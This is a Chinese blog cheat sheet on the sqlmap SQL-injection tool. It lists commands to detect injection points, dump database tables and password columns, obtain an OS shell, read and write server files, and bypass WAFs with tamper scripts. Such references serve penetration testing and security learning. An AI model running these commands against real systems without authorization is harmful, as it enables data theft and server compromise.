sqlmap 用法

最新推荐文章于 2024-03-13 10:36:47 发布
最新推荐文章于 2024-03-13 10:36:47 发布
阅读量166 收藏
点赞数
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41661777/article/details/102789498
版权

1、 判断是否存在注入

sqlmap -u url?id=1
当注入点后面参数大于等于两个时需要加双引号

sqlmap -u "url?id&uid=2"

 

2、判断文本是否存在注入

使用抓包生成web数据包require.txt

sqlmap -r require.txt

 

3、基本注入命令

sqlmap -u url?id=1 --dbs

查询当前用户下所有数据库

sqlmap -u url?id=1 -D exp  --tables

获取数据库中的表名

sqlmap -u url?id=1 -D exp  -T exptable --columns

获取字段名

sqlmap -u url?id=1 -D exp  -T exptable -C  username,passwd --dump

获取字段内容

sqlmap -u url?id=1 --users

获取所有用户

sqlmap -u url?id=1 -passwords

列出数据库用户的密码,如果包含用户密码权限,sqlmap会列举出用户,然后列出hash,并尝试破解

sqlmap -u url?id=1 --current-db

获取当前网站数据库名称

sqlmap -u url?id=1 --current-user

获取当前数据库用户名称

 

4、sqlmap参数

--level 5

指需要执行的测试等级,可以补选,默认为1,一共5个等级,自然5级的payload最多,解析最慢,

--is-dba

查看当前账户是否为数据管理员账户

--roles

列出数据库管理员角色

--referer

当--level参数设置为3或3以上时会尝试对referer注入

--sql-shell

用于执行sql语句

--os-cmd.--os-shell

运行任意操作系统命令(如果数据库为Mysql,postgreSQL,sqlmap上传一个二进制库包含sys_exec()和sys_eval(),那么创建的两个函数就可以执行系统命令)
--os-shell模拟一个真是的shell

--file-read

读取执行文件
exp:sqlmap -u url?id=1 \ --file-read path -v 1

--file-write --file-dest

写入本地文件到服务器中
exp:sqlmap -u url?id=1 --file-write\ path --file-dest path -v 1

 

5、sqlmap绕过脚本tamper(绕过WAF等)

sqlmap XXXX --tamper "模块名"

常用tamper脚本

apostrphemask.py

将引号替换为UTF-8

base64encode.py

替换为base64编码

multiplespaces.py

围绕SQL关键字添加多个空格

space2plus.py

用+号替换空格

nonrecursivereplacement.py

用双重语句替代预定义的SQL关键字(适用于非常弱的自定义过滤器)

space2randomblank.py

将空格替换为其他有效字符

unionalltounion.py

将UNION ALL SELECT 替换为UNION SELECT

securesphere.py

追加特制的字符串

space2hash.py

将空格替换为#号,并添加一个随机字符串和换行符

space2mssqlblank.py(mssql)

将空格替换为其他空符号

space2mssqlhash.py

将空格替换为#号,并添加一个换行符

between.py

用NOT BETWEEN 0 AND 替换大于号,用BETWEEN AND 替换等号

percentage.py

ASP允许在每个字符前面添加一个%号

sp_password.py

从DBMS日志的自动模糊处理的有效载荷中追加sp_password

charencode.py

对给定的Payload全部字符使用RL编码(不处理已经编码的字符)

randomcase.py

随机大小写

charunicodeencode.py

字符串unicode编码

space2comment.py

将空格替换为/**/

equaltolike.py

将等号替换为like

greatest.py

绕过对">"的过滤,用GREATEST替换大于号

modsecurityversioned.py

过滤空格,使用MySQL内联注释方式进行注入

space2mysqlblank.py

将空格替换为其他空白符号

modsecurityzeroversioned.py

使用MySQL内联注释的方式(/*!00000*/)进行注入

space2mysqldash.py

将空格替换为--,并添加一个换行符

bluecoat.py

在SQL语句后用有效的随机空白符替换空格符,随后用LIKE替换等于号

versionedkeywords.py

注释绕过

halfversionedmorekeywords.py

当数据库为MySQL时绕过防火墙,在每个关键字之前添加Mysql 版本注释

space2morehash.py

将空格替换为#,并添加一个随机字符串和换行符

apostrophenullencode.py

用非法双字节unicode.py字符替换单引号

appendnullbyte.py

在有效符合的结束位置加载零字节字符编码

chardobleencode.py

对给定的payload全部使用双重URL编码

unmagicquotes.py

用一个多字节组合(%bf%27)和末尾通用注释一起替换空格

randomcomments.py

用/**/分割SQL关键字

YSQ-911
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap使用方法
08-26
sqlmap -p 指定测试参数 -b 获取banner --dbs 列举数据库 --is-dba 是否是管理员权限 --current-db 当前数据库 --current-user 当前用户 --tables 列举数据库的表名 --count 检索所有条目数 --columns 获取表的列名 --dump 获取表中的数据,包含列 --dump-all 转存DBMS数据库所有表项目 --level 测试等级(1-5),默认为1 -v 显示详细信息 读取数据库--->读取表---->读取表的列---->获取内容
SQLmap
m0_65332604的博客
04-06 2085
SQLmap
sqlmap基本使用方式(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
03-13 1129
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。会清空之前的session,重新测试该目标。
SQLMap 使用参数详解
qq_37019068的博客
10-09 1万+
SQLMap 使用参数详解 SQLMap是一款自动化的SQL注入测试工具,在kali上已集成 如果不想使用kali的话,可以从github上直接拉取开源项目 git clone https://github.com/sqlmapproject/sqlmap.git 注:最新版的sqlmap应该是支持python3的,但是如果python3无法使用的话可以试试切换成python2执行 常见参数 -h 输出参数说明 -hh 输出详细的参数
sqlmap -u -r参数的使用
qq_52072846的博客
03-15 1万+
SQLMAP基本使用实例 -u参数的用法: 1.爆当前数据库的库名 sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" 爆指定数据库中的表名 sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security --tables
sqlmap常用基础命令
m0_73826804的博客
02-21 386
-os-cmd,--os-shell 运行任意操作系统命令(仅支持MySQL、PostgreSQL、SQL Server)--file-write "本地文件路径" --file-dest "远程绝对路径" 上传文件到数据库服务器中。--sql-shell 运行自定义SQL语句 用法sqlmap -u url --sql-shell。sqlmap -u url -D 数据库名 -T 表名 --columns #列出字段。sqlmap -u url -D 数据库名 -T 表名 --dump。
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
sqlmap使用方法笔记
04-21
网络安全攻防工具 sqlmap 使用方法笔记,包括攻击实例和使用简介,是听课程做的笔记,适合初学者
sqlmap用法
12-03
sqlmap用法英文文档,你们懂的
Web应用安全:Sqlmap用法介绍.pptx
06-20
Sqlmap用法介绍 搭建phpStudy站点 搭建DVWA 2. Sqlmap SQL注入演示 搭建phpStudy phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可...
Sqlmap用法详解
12-02
非常使用的Sqlmap使用方法详细介绍,欢迎大家下载学习
SQLmap使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
06-20 3万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
sqlmap基本使用方法
zjc的专栏
05-16 4437
sqlmap是安全测试工具,通常用于对已知的http接口进行sql注入测试,一旦注入成功,可以获取到后台包括数据库表、用户信息、数据内容等多种敏感信息,对web漏洞防范有重要意义。 基本语法 1.先进行注入点探测,常规语法是: python sqlmap.py –u [url] 说明:url 一般选择包括参数输入的链接。如果是get方法,就直接跟在url后面用?补充参数。如果是...
【简单工具】SQLMap十大常用功能浅析(待完善)
Fighting_hawk的博客
01-28 4319
1. 了解SQLMap的主要功能和用法; 2. 后续再结合SQL语句、注入原理分析每个命令的实现过程。
SQLMAP基础使用 -u
Z_l123的博客
02-18 428
1.访问SQLi-Labs网站 访问Less-3,并根据网页提示给定一个GET参数 http://127.0.0.1/sqli-labs/Less-3/?id=1 2.启动SQLMAP 进入sqlmap目录,在搜索框输入cmd,并回车 3.寻找注入点 使用以下命令自动寻找网站的注入点,并获取网站及后台数据库的基本信息: python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-3/?id=1" 检测结果: 4.获.
SQLmap参数详解
Williamanddog的博客
01-19 5263
目标URL参数:-u或者--url 格式:http(s)://targeturl[:port]/[…] 例如:python sqlmap.py -u "从Burp或者WebScarab代理中获取日志 参数:-l 可以直接吧Burp proxy或者WebScarab proxy中的日志直接导出来交给sqlmap来一个一个检测是否有 注入。 从文本中获取多个目标扫描 参数:-m 文件中保存url,sqlmap会一个一个检测 从文件中加载HTTP请求 参数:-r。
sqlmap参数注释第二节
weixin_41467564的博客
01-15 175
sqlmap -u “url” --data=“id” --data参数代表采用post方法进行注入,等于号后面的id就是所存在可以注入点的地方,将利用burspsuit软件抓包后,将注入点复制到双引号里运行即可 sqlmap -u “http://www.xxx.com” -f --banner --dbs --users (-f参数代表获取对应的指纹信息 --banner参数或许对应的ba...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值